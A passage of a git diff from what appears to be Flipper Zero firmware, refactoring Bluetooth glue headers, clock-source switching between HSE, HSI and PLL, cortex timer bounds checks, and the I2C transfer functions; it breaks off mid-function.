0x98, 0x4a, 0x7f, 0x2e, 0xd5, 0xb3, 0xe5, 0x8f }}; + +#define SERIAL_SVC_TX_CHAR_UUID \ + { 0x00, 0x00, 0xfe, 0x61, 0x8e, 0x22, 0x45, 0x41, 0x9d, 0x4c, 0x21, 0xed, 0xae, 0x82, 0xed, 0x19 } +#define SERIAL_SVC_RX_CHAR_UUID \ + { 0x00, 0x00, 0xfe, 0x62, 0x8e, 0x22, 0x45, 0x41, 0x9d, 0x4c, 0x21, 0xed, 0xae, 0x82, 0xed, 0x19 } +#define SERIAL_SVC_FLOW_CONTROL_UUID \ + { 0x00, 0x00, 0xfe, 0x63, 0x8e, 0x22, 0x45, 0x41, 0x9d, 0x4c, 0x21, 0xed, 0xae, 0x82, 0xed, 0x19 } +#define SERIAL_SVC_RPC_STATUS_UUID \ + { 0x00, 0x00, 0xfe, 0x64, 0x8e, 0x22, 0x45, 0x41, 0x9d, 0x4c, 0x21, 0xed, 0xae, 0x82, 0xed, 0x19 } diff --git a/firmware/targets/f7/ble_glue/tl_dbg_conf.h b/firmware/targets/f7/ble_glue/tl_dbg_conf.h index ce58af32b..daaa9d82b 100644 --- a/firmware/targets/f7/ble_glue/tl_dbg_conf.h +++ b/firmware/targets/f7/ble_glue/tl_dbg_conf.h @@ -1,39 +1,12 @@ -/* USER CODE BEGIN Header */ -/** - ****************************************************************************** - * File Name : App/tl_dbg_conf.h - * Description : Debug configuration file for stm32wpan transport layer interface. - * - ****************************************************************************** - * @attention - * - *

© Copyright (c) 2020 STMicroelectronics. - * All rights reserved.

- * - * This software component is licensed by ST under Ultimate Liberty license - * SLA0044, the "License"; You may not use this file except in compliance with - * the License. You may obtain a copy of the License at: - * www.st.com/SLA0044 - * - ****************************************************************************** - */ -/* USER CODE END Header */ +#pragma once -/* Define to prevent recursive inclusion -------------------------------------*/ -#ifndef __TL_DBG_CONF_H -#define __TL_DBG_CONF_H +#include "app_conf.h" /* required as some configuration used in dbg_trace.h are set there */ +#include "dbg_trace.h" #ifdef __cplusplus extern "C" { #endif -/* USER CODE BEGIN Tl_Conf */ - -/* Includes ------------------------------------------------------------------*/ -#include "app_conf.h" /* required as some configuration used in dbg_trace.h are set there */ -#include "dbg_trace.h" -#include "hw_if.h" - /** * Enable or Disable traces * The raw data output is the hci binary packet format as specified by the BT specification * @@ -124,12 +97,6 @@ extern "C" { #define TL_MM_DBG_MSG(...) #endif -/* USER CODE END Tl_Conf */ - #ifdef __cplusplus } #endif - -#endif /*__TL_DBG_CONF_H */ - -/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/firmware/targets/f7/ble_glue/utilities_conf.h b/firmware/targets/f7/ble_glue/utilities_conf.h deleted file mode 100644 index 9c15f2263..000000000 --- a/firmware/targets/f7/ble_glue/utilities_conf.h +++ /dev/null @@ -1,68 +0,0 @@ -/* USER CODE BEGIN Header */ -/** - ****************************************************************************** - * File Name : utilities_conf.h - * Description : Configuration file for STM32 Utilities. - * - ****************************************************************************** - * @attention - * - *

© Copyright (c) 2019 STMicroelectronics. - * All rights reserved.

- * - * This software component is licensed by ST under BSD 3-Clause license, - * the "License"; You may not use this file except in compliance with the - * License. You may obtain a copy of the License at: - * opensource.org/licenses/BSD-3-Clause - * - ****************************************************************************** - */ -/* USER CODE END Header */ - -/* Define to prevent recursive inclusion -------------------------------------*/ -#ifndef UTILITIES_CONF_H -#define UTILITIES_CONF_H - -#ifdef __cplusplus -extern "C" { -#endif - -#include "cmsis_compiler.h" -#include "string.h" -#include - -/****************************************************************************** - * common - ******************************************************************************/ -#define UTILS_ENTER_CRITICAL_SECTION() FURI_CRITICAL_ENTER() - -#define UTILS_EXIT_CRITICAL_SECTION() FURI_CRITICAL_EXIT() - -#define UTILS_MEMSET8(dest, value, size) memset(dest, value, size); - -/****************************************************************************** - * tiny low power manager - * (any macro that does not need to be modified can be removed) - ******************************************************************************/ -#define UTIL_LPM_INIT_CRITICAL_SECTION() -#define UTIL_LPM_ENTER_CRITICAL_SECTION() UTILS_ENTER_CRITICAL_SECTION() -#define UTIL_LPM_EXIT_CRITICAL_SECTION() UTILS_EXIT_CRITICAL_SECTION() - -/****************************************************************************** - * sequencer - * (any macro that does not need to be modified can be removed) - ******************************************************************************/ -#define UTIL_SEQ_INIT_CRITICAL_SECTION() -#define UTIL_SEQ_ENTER_CRITICAL_SECTION() UTILS_ENTER_CRITICAL_SECTION() -#define UTIL_SEQ_EXIT_CRITICAL_SECTION() UTILS_EXIT_CRITICAL_SECTION() -#define UTIL_SEQ_CONF_TASK_NBR (32) -#define UTIL_SEQ_CONF_PRIO_NBR (2) -#define UTIL_SEQ_MEMSET8(dest, value, size) UTILS_MEMSET8(dest, value, size) - -#ifdef __cplusplus -} -#endif - -#endif /*UTILITIES_CONF_H */ - -/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/firmware/targets/f7/furi_hal/furi_hal_bt.c b/firmware/targets/f7/furi_hal/furi_hal_bt.c index 4f78f77de..9defefbfe 100644 --- a/firmware/targets/f7/furi_hal/furi_hal_bt.c +++ b/firmware/targets/f7/furi_hal/furi_hal_bt.c @@ -2,14 +2,18 @@ #include #include + #include +#include + +#include #include +#include #include #include #include -#include "battery_service.h" - +#include #include #define TAG "FuriHalBt" @@ -277,6 +281,7 @@ bool furi_hal_bt_start_app(FuriHalBtProfile profile, GapEventCallback event_cb, } void furi_hal_bt_reinit() { + furi_hal_power_insomnia_enter(); FURI_LOG_I(TAG, "Disconnect and stop advertising"); furi_hal_bt_stop_advertising(); @@ -306,6 +311,7 @@ void furi_hal_bt_reinit() { furi_hal_bt_init(); furi_hal_bt_start_radio_stack(); + furi_hal_power_insomnia_exit(); } bool furi_hal_bt_change_app(FuriHalBtProfile profile, GapEventCallback event_cb, void* context) { diff --git a/firmware/targets/f7/furi_hal/furi_hal_bt_hid.c b/firmware/targets/f7/furi_hal/furi_hal_bt_hid.c index 8e05a9904..2bbfc1523 100644 --- a/firmware/targets/f7/furi_hal/furi_hal_bt_hid.c +++ b/firmware/targets/f7/furi_hal/furi_hal_bt_hid.c @@ -1,11 +1,11 @@ #include #include -#include "usb_hid.h" -#include "dev_info_service.h" -#include "battery_service.h" -#include "hid_service.h" +#include +#include +#include #include +#include #define FURI_HAL_BT_INFO_BASE_USB_SPECIFICATION (0x0101) #define FURI_HAL_BT_INFO_COUNTRY_CODE (0x00) @@ -221,7 +221,7 @@ void furi_hal_bt_hid_start() { FURI_HAL_BT_HID_INFO_FLAG_REMOTE_WAKE_MSK | FURI_HAL_BT_HID_INFO_FLAG_NORMALLY_CONNECTABLE_MSK, }; - hid_svc_update_info(hid_info_val, sizeof(hid_info_val)); + hid_svc_update_info(hid_info_val); } void furi_hal_bt_hid_stop() { diff --git a/firmware/targets/f7/furi_hal/furi_hal_bt_serial.c b/firmware/targets/f7/furi_hal/furi_hal_bt_serial.c index 2539e6bd0..2927d946f 100644 --- a/firmware/targets/f7/furi_hal/furi_hal_bt_serial.c +++ b/firmware/targets/f7/furi_hal/furi_hal_bt_serial.c @@ -1,7 +1,7 @@ #include -#include "dev_info_service.h" -#include "battery_service.h" -#include "serial_service.h" +#include +#include +#include #include diff --git a/firmware/targets/f7/furi_hal/furi_hal_clock.c b/firmware/targets/f7/furi_hal/furi_hal_clock.c index 736ad9f7c..86c8fd467 100644 --- a/firmware/targets/f7/furi_hal/furi_hal_clock.c +++ b/firmware/targets/f7/furi_hal/furi_hal_clock.c @@ -4,19 +4,26 @@ #include #include +#include #include #include +#include +#include + #define TAG "FuriHalClock" -#define CPU_CLOCK_HZ_EARLY 4000000 -#define CPU_CLOCK_HZ_MAIN 64000000 +#define CPU_CLOCK_EARLY_HZ 4000000 +#define CPU_CLOCK_HSI16_HZ 16000000 +#define CPU_CLOCK_HSE_HZ 32000000 +#define CPU_CLOCK_PLL_HZ 64000000 + #define TICK_INT_PRIORITY 15U #define HS_CLOCK_IS_READY() (LL_RCC_HSE_IsReady() && LL_RCC_HSI_IsReady()) #define LS_CLOCK_IS_READY() (LL_RCC_LSE_IsReady() && LL_RCC_LSI1_IsReady()) void furi_hal_clock_init_early() { - LL_SetSystemCoreClock(CPU_CLOCK_HZ_EARLY); + LL_SetSystemCoreClock(CPU_CLOCK_EARLY_HZ); LL_Init1msTick(SystemCoreClock); } @@ -24,11 +31,6 @@ void furi_hal_clock_deinit_early() { } void furi_hal_clock_init() { - /* Prepare Flash memory for 64MHz system clock */ - LL_FLASH_SetLatency(LL_FLASH_LATENCY_3); - while(LL_FLASH_GetLatency() != LL_FLASH_LATENCY_3) - ; - /* HSE and HSI configuration and activation */ LL_RCC_HSE_SetCapacitorTuning(0x26); LL_RCC_HSE_Enable(); @@ -49,9 +51,6 @@ void furi_hal_clock_init() { while(!LS_CLOCK_IS_READY()) ; - /* RF wakeup */ - LL_RCC_SetRFWKPClockSource(LL_RCC_RFWKP_CLKSOURCE_LSE); - LL_EXTI_EnableIT_0_31( LL_EXTI_LINE_18); /* Why? Because that's why. See RM0434, Table 61. CPU1 vector table. */ LL_EXTI_EnableRisingTrig_0_31(LL_EXTI_LINE_18); @@ -79,12 +78,17 @@ void furi_hal_clock_init() { ; /* Sysclk activation on the main PLL */ - /* Set CPU1 prescaler*/ + /* Set CPU1 prescaler */ LL_RCC_SetAHBPrescaler(LL_RCC_SYSCLK_DIV_1); - /* Set CPU2 prescaler*/ + /* Set CPU2 prescaler, from this point we are not allowed to touch it. */ LL_C2_RCC_SetAHBPrescaler(LL_RCC_SYSCLK_DIV_2); + /* Prepare Flash memory for work on 64MHz system clock */ + LL_FLASH_SetLatency(LL_FLASH_LATENCY_3); + while(LL_FLASH_GetLatency() != LL_FLASH_LATENCY_3) + ; + LL_RCC_SetSysClkSource(LL_RCC_SYS_CLKSOURCE_PLL); while(LL_RCC_GetSysClkSource() != LL_RCC_SYS_CLKSOURCE_STATUS_PLL) ; @@ -104,7 +108,7 @@ void furi_hal_clock_init() { ; /* Update CMSIS variable (which can be updated also through SystemCoreClockUpdate function) */ - LL_SetSystemCoreClock(CPU_CLOCK_HZ_MAIN); + LL_SetSystemCoreClock(CPU_CLOCK_PLL_HZ); /* Update the time base */ LL_Init1msTick(SystemCoreClock); @@ -122,7 +126,7 @@ void furi_hal_clock_init() { FURI_LOG_I(TAG, "Init OK"); } -void furi_hal_clock_switch_to_hsi() { +void furi_hal_clock_switch_hse2hsi() { LL_RCC_HSI_Enable(); while(!LL_RCC_HSI_IsReady()) @@ -134,38 +138,27 @@ void furi_hal_clock_switch_to_hsi() { while(LL_RCC_GetSysClkSource() != LL_RCC_SYS_CLKSOURCE_STATUS_HSI) ; - LL_C2_RCC_SetAHBPrescaler(LL_RCC_SYSCLK_DIV_1); - LL_FLASH_SetLatency(LL_FLASH_LATENCY_0); while(LL_FLASH_GetLatency() != LL_FLASH_LATENCY_0) ; } -void furi_hal_clock_switch_to_pll() { +void furi_hal_clock_switch_hsi2hse() { #ifdef FURI_HAL_CLOCK_TRACK_STARTUP uint32_t clock_start_time = DWT->CYCCNT; #endif LL_RCC_HSE_Enable(); - LL_RCC_PLL_Enable(); - LL_RCC_PLLSAI1_Enable(); - while(!LL_RCC_HSE_IsReady()) ; - while(!LL_RCC_PLL_IsReady()) - ; - while(!LL_RCC_PLLSAI1_IsReady()) + + LL_FLASH_SetLatency(LL_FLASH_LATENCY_1); + while(LL_FLASH_GetLatency() != LL_FLASH_LATENCY_1) ; - LL_C2_RCC_SetAHBPrescaler(LL_RCC_SYSCLK_DIV_2); + LL_RCC_SetSysClkSource(LL_RCC_SYS_CLKSOURCE_HSE); - LL_FLASH_SetLatency(LL_FLASH_LATENCY_3); - while(LL_FLASH_GetLatency() != LL_FLASH_LATENCY_3) - ; - - LL_RCC_SetSysClkSource(LL_RCC_SYS_CLKSOURCE_PLL); - - while(LL_RCC_GetSysClkSource() != LL_RCC_SYS_CLKSOURCE_STATUS_PLL) + while(LL_RCC_GetSysClkSource() != LL_RCC_SYS_CLKSOURCE_STATUS_HSE) ; #ifdef FURI_HAL_CLOCK_TRACK_STARTUP @@ -176,6 +169,48 @@ void furi_hal_clock_switch_to_pll() { #endif } +bool furi_hal_clock_switch_hse2pll() { + furi_assert(LL_RCC_GetSysClkSource() == LL_RCC_SYS_CLKSOURCE_STATUS_HSE); + + LL_RCC_PLL_Enable(); + LL_RCC_PLLSAI1_Enable(); + + while(!LL_RCC_PLL_IsReady()) + ; + while(!LL_RCC_PLLSAI1_IsReady()) + ; + + if(SHCI_C2_SetSystemClock(SET_SYSTEM_CLOCK_HSE_TO_PLL) != SHCI_Success) { + return false; + } + + furi_check(LL_RCC_GetSysClkSource() == LL_RCC_SYS_CLKSOURCE_STATUS_PLL); + + LL_SetSystemCoreClock(CPU_CLOCK_PLL_HZ); + SysTick->LOAD = (uint32_t)((SystemCoreClock / 1000) - 1UL); + + return true; +} + +bool furi_hal_clock_switch_pll2hse() { + furi_assert(LL_RCC_GetSysClkSource() == LL_RCC_SYS_CLKSOURCE_STATUS_PLL); + + LL_RCC_HSE_Enable(); + while(!LL_RCC_HSE_IsReady()) + ; + + if(SHCI_C2_SetSystemClock(SET_SYSTEM_CLOCK_PLL_ON_TO_HSE) != SHCI_Success) { + return false; + } + + furi_check(LL_RCC_GetSysClkSource() == LL_RCC_SYS_CLKSOURCE_STATUS_HSE); + + LL_SetSystemCoreClock(CPU_CLOCK_HSE_HZ); + SysTick->LOAD = (uint32_t)((SystemCoreClock / 1000) - 1UL); + + return true; +} + void furi_hal_clock_suspend_tick() { CLEAR_BIT(SysTick->CTRL, SysTick_CTRL_ENABLE_Msk); } diff --git a/firmware/targets/f7/furi_hal/furi_hal_clock.h b/firmware/targets/f7/furi_hal/furi_hal_clock.h index 5e651bbd3..3100b619f 100644 --- a/firmware/targets/f7/furi_hal/furi_hal_clock.h +++ b/firmware/targets/f7/furi_hal/furi_hal_clock.h @@ -1,11 +1,12 @@ #pragma once +#include +#include + #ifdef __cplusplus extern "C" { #endif -#include - typedef enum { FuriHalClockMcoLse, FuriHalClockMcoSysclk, @@ -40,11 +41,23 @@ void furi_hal_clock_deinit_early(); /** Initialize clocks */ void furi_hal_clock_init(); -/** Switch to HSI clock */ -void furi_hal_clock_switch_to_hsi(); +/** Switch clock from HSE to HSI */ +void furi_hal_clock_switch_hse2hsi(); -/** Switch to PLL clock */ -void furi_hal_clock_switch_to_pll(); +/** Switch clock from HSI to HSE */ +void furi_hal_clock_switch_hsi2hse(); + +/** Switch clock from HSE to PLL + * + * @return true if changed, false if failed or not possible at this moment + */ +bool furi_hal_clock_switch_hse2pll(); + +/** Switch clock from PLL to HSE + * + * @return true if changed, false if failed or not possible at this moment + */ +bool furi_hal_clock_switch_pll2hse(); /** Stop SysTick counter without resetting */ void furi_hal_clock_suspend_tick(); diff --git a/firmware/targets/f7/furi_hal/furi_hal_console.c b/firmware/targets/f7/furi_hal/furi_hal_console.c index 2bdc57250..0b113d2da 100644 --- a/firmware/targets/f7/furi_hal/furi_hal_console.c +++ b/firmware/targets/f7/furi_hal/furi_hal_console.c @@ -5,8 +5,6 @@ #include #include -#include - #include #define TAG "FuriHalConsole" diff --git a/firmware/targets/f7/furi_hal/furi_hal_cortex.c b/firmware/targets/f7/furi_hal/furi_hal_cortex.c index 3fbe384e3..6b5efc376 100644 --- a/firmware/targets/f7/furi_hal/furi_hal_cortex.c +++ b/firmware/targets/f7/furi_hal/furi_hal_cortex.c @@ -15,8 +15,11 @@ void furi_hal_cortex_init_early() { } void furi_hal_cortex_delay_us(uint32_t microseconds) { + furi_check(microseconds < (UINT32_MAX / FURI_HAL_CORTEX_INSTRUCTIONS_PER_MICROSECOND)); + uint32_t start = DWT->CYCCNT; uint32_t time_ticks = FURI_HAL_CORTEX_INSTRUCTIONS_PER_MICROSECOND * microseconds; + while((DWT->CYCCNT - start) < time_ticks) { }; } @@ -26,6 +29,8 @@ uint32_t furi_hal_cortex_instructions_per_microsecond() { } FuriHalCortexTimer furi_hal_cortex_timer_get(uint32_t timeout_us) { + furi_check(timeout_us < (UINT32_MAX / FURI_HAL_CORTEX_INSTRUCTIONS_PER_MICROSECOND)); + FuriHalCortexTimer cortex_timer = {0}; cortex_timer.start = DWT->CYCCNT; cortex_timer.value = FURI_HAL_CORTEX_INSTRUCTIONS_PER_MICROSECOND * timeout_us; diff --git a/firmware/targets/f7/furi_hal/furi_hal_flash.c b/firmware/targets/f7/furi_hal/furi_hal_flash.c index 796d20b19..bc65b29eb 100644 --- a/firmware/targets/f7/furi_hal/furi_hal_flash.c +++ b/firmware/targets/f7/furi_hal/furi_hal_flash.c @@ -7,6 +7,9 @@ #include #include +#include + +#include #define TAG "FuriHalFlash" diff --git a/firmware/targets/f7/furi_hal/furi_hal_i2c.c b/firmware/targets/f7/furi_hal/furi_hal_i2c.c index bdfe0b0a3..8c7b054e3 100644 --- a/firmware/targets/f7/furi_hal/furi_hal_i2c.c +++ b/firmware/targets/f7/furi_hal/furi_hal_i2c.c @@ -5,7 +5,6 @@ #include #include -#include #include #define TAG "FuriHalI2c" @@ -27,7 +26,7 @@ void furi_hal_i2c_acquire(FuriHalI2cBusHandle* handle) { furi_hal_power_insomnia_enter(); // Lock bus access handle->bus->callback(handle->bus, FuriHalI2cBusEventLock); - // Ensuree that no active handle set + // Ensure that no active handle set furi_check(handle->bus->current_handle == NULL); // Set current handle handle->bus->current_handle = handle; @@ -51,177 +50,265 @@ void furi_hal_i2c_release(FuriHalI2cBusHandle* handle) { furi_hal_power_insomnia_exit(); } +static bool + furi_hal_i2c_wait_for_idle(I2C_TypeDef* i2c, FuriHalI2cBegin begin, FuriHalCortexTimer timer) { + do { + if(furi_hal_cortex_timer_is_expired(timer)) { + return false; + } + } while(begin == FuriHalI2cBeginStart && LL_I2C_IsActiveFlag_BUSY(i2c)); + // Only check if the bus is busy if starting a new transaction, if not we already control the bus + + return true; +} + +static bool + furi_hal_i2c_wait_for_end(I2C_TypeDef* i2c, FuriHalI2cEnd end, FuriHalCortexTimer timer) { + // If ending the transaction with a stop condition, wait for it to be detected, otherwise wait for a transfer complete flag + bool wait_for_stop = end == FuriHalI2cEndStop; + uint32_t end_mask = (wait_for_stop) ? I2C_ISR_STOPF : (I2C_ISR_TC | I2C_ISR_TCR); + + while((i2c->ISR & end_mask) == 0) { + if(furi_hal_cortex_timer_is_expired(timer)) { + return false; + } + } + + return true; +} + +static uint32_t + furi_hal_i2c_get_start_signal(FuriHalI2cBegin begin, bool ten_bit_address, bool read) { + switch(begin) { + case FuriHalI2cBeginRestart: + if(read) { + return ten_bit_address ? LL_I2C_GENERATE_RESTART_10BIT_READ : + LL_I2C_GENERATE_RESTART_7BIT_READ; + } else { + return ten_bit_address ? LL_I2C_GENERATE_RESTART_10BIT_WRITE : + LL_I2C_GENERATE_RESTART_7BIT_WRITE; + } + case FuriHalI2cBeginResume: + return LL_I2C_GENERATE_NOSTARTSTOP; + case FuriHalI2cBeginStart: + default: + return read ? LL_I2C_GENERATE_START_READ : LL_I2C_GENERATE_START_WRITE; + } +} + +static uint32_t furi_hal_i2c_get_end_signal(FuriHalI2cEnd end) { + switch(end) { + case FuriHalI2cEndAwaitRestart: + return LL_I2C_MODE_SOFTEND; + case FuriHalI2cEndPause: + return LL_I2C_MODE_RELOAD; + case FuriHalI2cEndStop: + default: + return LL_I2C_MODE_AUTOEND; + } +} + +static bool furi_hal_i2c_transfer_is_aborted(I2C_TypeDef* i2c) { + return LL_I2C_IsActiveFlag_STOP(i2c) && + !(LL_I2C_IsActiveFlag_TC(i2c) || LL_I2C_IsActiveFlag_TCR(i2c)); +} + +static bool furi_hal_i2c_transfer( + I2C_TypeDef* i2c, + uint8_t* data, + uint32_t size, + FuriHalI2cEnd end, + bool read, + FuriHalCortexTimer timer) { + bool ret = true; + + while(size > 0) { + bool should_stop = furi_hal_cortex_timer_is_expired(timer) || + furi_hal_i2c_transfer_is_aborted(i2c); + + // Modifying the data pointer's data is UB if read is true + if(read && LL_I2C_IsActiveFlag_RXNE(i2c)) { + *data = LL_I2C_ReceiveData8(i2c); + data++; + size--; + } else if(!read && LL_I2C_IsActiveFlag_TXIS(i2c)) { + LL_I2C_TransmitData8(i2c, *data); + data++; + size--; + } + + // Exit on timeout or premature stop, probably caused by a nacked address or byte + if(should_stop) { + ret = size == 0; // If the transfer was over, still a success + break; + } + } + + if(ret) { + ret = furi_hal_i2c_wait_for_end(i2c, end, timer); + } + + LL_I2C_ClearFlag_STOP(i2c); + + return ret; +} + +static bool furi_hal_i2c_transaction( + I2C_TypeDef* i2c, + uint16_t address, + bool ten_bit, + uint8_t* data, + size_t size, + FuriHalI2cBegin begin, + FuriHalI2cEnd end, + bool read, + FuriHalCortexTimer timer) { + uint32_t addr_size = ten_bit ? LL_I2C_ADDRSLAVE_10BIT : LL_I2C_ADDRSLAVE_7BIT; + uint32_t start_signal = furi_hal_i2c_get_start_signal(begin, ten_bit, read); + + if(!furi_hal_i2c_wait_for_idle(i2c, begin, timer)) { + return false; + } + + do { + uint8_t transfer_size = size; + FuriHalI2cEnd transfer_end = end; + + if(size > 255) { + transfer_size = 255; + transfer_end = FuriHalI2cEndPause; + } + + uint32_t end_signal = furi_hal_i2c_get_end_signal(transfer_end); + + LL_I2C_HandleTransfer(i2c, address, addr_size, transfer_size, end_signal, start_signal); + + if(!furi_hal_i2c_transfer(i2c, data, transfer_size, transfer_end, read, timer)) { + return false; + } + + size -= transfer_size; + data += transfer_size; + start_signal = LL_I2C_GENERATE_NOSTARTSTOP; + } while(size > 0); + + return true; +} + +bool furi_hal_i2c_rx_ext( + FuriHalI2cBusHandle* handle, + uint16_t address, + bool ten_bit, + uint8_t* data, + size_t size, + FuriHalI2cBegin begin, + FuriHalI2cEnd end, + uint32_t timeout) { + furi_check(handle->bus->current_handle == handle); + + FuriHalCortexTimer timer = furi_hal_cortex_timer_get(timeout * 1000); + + return furi_hal_i2c_transaction( + handle->bus->i2c, address, ten_bit, data, size, begin, end, true, timer); +} + +bool furi_hal_i2c_tx_ext( + FuriHalI2cBusHandle* handle, + uint16_t address, + bool ten_bit, + const uint8_t* data, + size_t size, + FuriHalI2cBegin begin, + FuriHalI2cEnd end, + uint32_t timeout) { + furi_check(handle->bus->current_handle == handle); + + FuriHalCortexTimer timer = furi_hal_cortex_timer_get(timeout * 1000); + + return furi_hal_i2c_transaction( + handle->bus->i2c, address, ten_bit, (uint8_t*)data, size, begin, end, false, timer); +} + bool furi_hal_i2c_tx( FuriHalI2cBusHandle* handle, uint8_t address, const uint8_t* data, - uint8_t size, + size_t size, uint32_t timeout) { - furi_check(handle->bus->current_handle == handle); furi_assert(timeout > 0); - bool ret = true; - FuriHalCortexTimer timer = furi_hal_cortex_timer_get(timeout * 1000); - - do { - while(LL_I2C_IsActiveFlag_BUSY(handle->bus->i2c)) { - if(furi_hal_cortex_timer_is_expired(timer)) { - ret = false; - break; - } - } - - if(!ret) { - break; - } - - LL_I2C_HandleTransfer( - handle->bus->i2c, - address, - LL_I2C_ADDRSLAVE_7BIT, - size, - LL_I2C_MODE_AUTOEND, - LL_I2C_GENERATE_START_WRITE); - - while(!LL_I2C_IsActiveFlag_STOP(handle->bus->i2c) || size > 0) { - if(LL_I2C_IsActiveFlag_TXIS(handle->bus->i2c)) { - LL_I2C_TransmitData8(handle->bus->i2c, (*data)); - data++; - size--; - } - - if(furi_hal_cortex_timer_is_expired(timer)) { - ret = false; - break; - } - } - - LL_I2C_ClearFlag_STOP(handle->bus->i2c); - } while(0); - - return ret; + return furi_hal_i2c_tx_ext( + handle, address, false, data, size, FuriHalI2cBeginStart, FuriHalI2cEndStop, timeout); } bool furi_hal_i2c_rx( FuriHalI2cBusHandle* handle, uint8_t address, uint8_t* data, - uint8_t size, + size_t size, uint32_t timeout) { - furi_check(handle->bus->current_handle == handle); furi_assert(timeout > 0); - bool ret = true; - FuriHalCortexTimer timer = furi_hal_cortex_timer_get(timeout * 1000); - - do { - while(LL_I2C_IsActiveFlag_BUSY(handle->bus->i2c)) { - if(furi_hal_cortex_timer_is_expired(timer)) { - ret = false; - break; - } - } - - if(!ret) { - break; - } - - LL_I2C_HandleTransfer( - handle->bus->i2c, - address, - LL_I2C_ADDRSLAVE_7BIT, - size, - LL_I2C_MODE_AUTOEND, - LL_I2C_GENERATE_START_READ); - - while(!LL_I2C_IsActiveFlag_STOP(handle->bus->i2c) || size > 0) { - if(LL_I2C_IsActiveFlag_RXNE(handle->bus->i2c)) { - *data = LL_I2C_ReceiveData8(handle->bus->i2c); - data++; - size--; - } - - if(furi_hal_cortex_timer_is_expired(timer)) { - ret = false; - break; - } - } - - LL_I2C_ClearFlag_STOP(handle->bus->i2c); - } while(0); - - return ret; + return furi_hal_i2c_rx_ext( + handle, address, false, data, size, FuriHalI2cBeginStart, FuriHalI2cEndStop, timeout); } bool furi_hal_i2c_trx( FuriHalI2cBusHandle* handle, uint8_t address, const uint8_t* tx_data, - uint8_t tx_size, + size_t tx_size, uint8_t* rx_data, - uint8_t rx_size, + size_t rx_size, uint32_t timeout) { - if(furi_hal_i2c_tx(handle, address, tx_data, tx_size, timeout) && - furi_hal_i2c_rx(handle, address, rx_data, rx_size, timeout)) { - return true; - } else { - return false; - } + return furi_hal_i2c_tx_ext( + handle, + address, + false, + tx_data, + tx_size, + FuriHalI2cBeginStart, + FuriHalI2cEndStop, + timeout) && + furi_hal_i2c_rx_ext( + handle, + address, + false, + rx_data, + rx_size, + FuriHalI2cBeginStart, + FuriHalI2cEndStop, + timeout); } bool furi_hal_i2c_is_device_ready(FuriHalI2cBusHandle* handle, uint8_t i2c_addr, uint32_t timeout) { furi_check(handle); - furi_check(handle->bus->current_handle == handle); furi_assert(timeout > 0); bool ret = true; FuriHalCortexTimer timer = furi_hal_cortex_timer_get(timeout * 1000); - do { - while(LL_I2C_IsActiveFlag_BUSY(handle->bus->i2c)) { - if(furi_hal_cortex_timer_is_expired(timer)) { - return false; - } - } + if(!furi_hal_i2c_wait_for_idle(handle->bus->i2c, FuriHalI2cBeginStart, timer)) { + return false; + } - handle->bus->i2c->CR2 = - ((((uint32_t)(i2c_addr) & (I2C_CR2_SADD)) | (I2C_CR2_START) | (I2C_CR2_AUTOEND)) & - (~I2C_CR2_RD_WRN)); + LL_I2C_HandleTransfer( + handle->bus->i2c, + i2c_addr, + LL_I2C_ADDRSLAVE_7BIT, + 0, + LL_I2C_MODE_AUTOEND, + LL_I2C_GENERATE_START_WRITE); - while((!LL_I2C_IsActiveFlag_NACK(handle->bus->i2c)) && - (!LL_I2C_IsActiveFlag_STOP(handle->bus->i2c))) { - if(furi_hal_cortex_timer_is_expired(timer)) { - return false; - } - } + if(!furi_hal_i2c_wait_for_end(handle->bus->i2c, FuriHalI2cEndStop, timer)) { + return false; + } - if(LL_I2C_IsActiveFlag_NACK(handle->bus->i2c)) { - while(!LL_I2C_IsActiveFlag_STOP(handle->bus->i2c)) { - if(furi_hal_cortex_timer_is_expired(timer)) { - return false; - } - } + ret = !LL_I2C_IsActiveFlag_NACK(handle->bus->i2c); - LL_I2C_ClearFlag_NACK(handle->bus->i2c); - - // Clear STOP Flag generated by autoend - LL_I2C_ClearFlag_STOP(handle->bus->i2c); - - // Generate actual STOP - LL_I2C_GenerateStopCondition(handle->bus->i2c); - - ret = false; - } - - while(!LL_I2C_IsActiveFlag_STOP(handle->bus->i2c)) { - if(furi_hal_cortex_timer_is_expired(timer)) { - return false; - } - } - - LL_I2C_ClearFlag_STOP(handle->bus->i2c); - } while(0); + LL_I2C_ClearFlag_NACK(handle->bus->i2c); + LL_I2C_ClearFlag_STOP(handle->bus->i2c); return ret; } @@ -257,7 +344,7 @@ bool furi_hal_i2c_read_mem( uint8_t i2c_addr, uint8_t mem_addr, uint8_t* data, - uint8_t len, + size_t len, uint32_t timeout) { furi_check(handle); @@ -272,11 +359,12 @@ bool furi_hal_i2c_write_reg_8( uint32_t timeout) { furi_check(handle); - uint8_t tx_data[2]; - tx_data[0] = reg_addr; - tx_data[1] = data; + const uint8_t tx_data[2] = { + reg_addr, + data, + }; - return furi_hal_i2c_tx(handle, i2c_addr, (const uint8_t*)&tx_data, 2, timeout); + return furi_hal_i2c_tx(handle, i2c_addr, tx_data, 2, timeout); } bool furi_hal_i2c_write_reg_16( @@ -287,69 +375,42 @@ bool furi_hal_i2c_write_reg_16( uint32_t timeout) { furi_check(handle); - uint8_t tx_data[3]; - tx_data[0] = reg_addr; - tx_data[1] = (data >> 8) & 0xFF; - tx_data[2] = data & 0xFF; + const uint8_t tx_data[3] = { + reg_addr, + (data >> 8) & 0xFF, + data & 0xFF, + }; - return furi_hal_i2c_tx(handle, i2c_addr, (const uint8_t*)&tx_data, 3, timeout); + return furi_hal_i2c_tx(handle, i2c_addr, tx_data, 3, timeout); } bool furi_hal_i2c_write_mem( FuriHalI2cBusHandle* handle, uint8_t i2c_addr, uint8_t mem_addr, - uint8_t* data, - uint8_t len, + const uint8_t* data, + size_t len, uint32_t timeout) { furi_check(handle); - furi_check(handle->bus->current_handle == handle); furi_assert(timeout > 0); - bool ret = true; - uint8_t size = len + 1; - FuriHalCortexTimer timer = furi_hal_cortex_timer_get(timeout * 1000); - - do { - while(LL_I2C_IsActiveFlag_BUSY(handle->bus->i2c)) { - if(furi_hal_cortex_timer_is_expired(timer)) { - ret = false; - break; - } - } - - if(!ret) { - break; - } - - LL_I2C_HandleTransfer( - handle->bus->i2c, - i2c_addr, - LL_I2C_ADDRSLAVE_7BIT, - size, - LL_I2C_MODE_AUTOEND, - LL_I2C_GENERATE_START_WRITE); - - while(!LL_I2C_IsActiveFlag_STOP(handle->bus->i2c) || size > 0) { - 